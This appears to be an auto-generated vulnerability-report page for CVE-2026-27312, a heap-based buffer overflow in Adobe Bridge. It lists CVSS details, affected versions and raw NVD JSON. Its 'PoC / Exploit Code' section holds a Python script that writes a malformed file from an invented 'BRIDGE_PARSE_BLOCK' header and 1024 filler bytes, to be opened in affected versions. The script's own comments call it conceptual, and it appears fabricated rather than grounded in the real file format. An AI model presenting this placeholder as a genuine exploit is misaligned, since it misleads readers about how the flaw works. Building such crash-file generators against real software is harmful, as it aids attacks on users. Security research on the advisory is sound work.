Security Vulnerability Report
中文
CVE-2026-27312 CVSS 7.8 HIGH

CVE-2026-27312

Published: 2026-04-14 20:16:35
Last Modified: 2026-04-15 19:59:17

Description

Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Bridge <= 16.0.2
Adobe Bridge <= 15.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-27312 # This script generates a malformed file designed to trigger a Heap-based Buffer Overflow in Adobe Bridge. # Note: This is a conceptual demonstration. The actual file format structure required to trigger the bug may vary. import struct def generate_malicious_file(filename): # Simulate a header or specific marker that Adobe Bridge parses file_header = b"BRIDGE_PARSE_BLOCK" # Create a payload larger than the expected heap buffer size to trigger the overflow. # Assuming the vulnerable buffer allocation is smaller than 1024 bytes. overflow_payload = b"A" * 1024 # Construct the malicious file content malicious_data = file_header + overflow_payload try: with open(filename, "wb") as f: f.write(malicious_data) print(f"[+] Malicious file '{filename}' generated successfully.") print(f"[+] Open this file in Adobe Bridge (affected versions) to reproduce the crash.") except IOError as e: print(f"[-] Error writing file: {e}") if __name__ == "__main__": generate_malicious_file("cve_2026_27312_exploit.bin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27312", "sourceIdentifier": "[email protected]", "published": "2026-04-14T20:16:34.730", "lastModified": "2026-04-15T19:59:17.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1.5", "matchCriteriaId": "8B4FBE0D-49AE-47B0-9A02-CF772B606C89"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:bridge:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.3", "matchCriteriaId": "AA94FD4C-CD52-43BC-9DD6-C688A783A5F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/bridge/apsb26-39.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}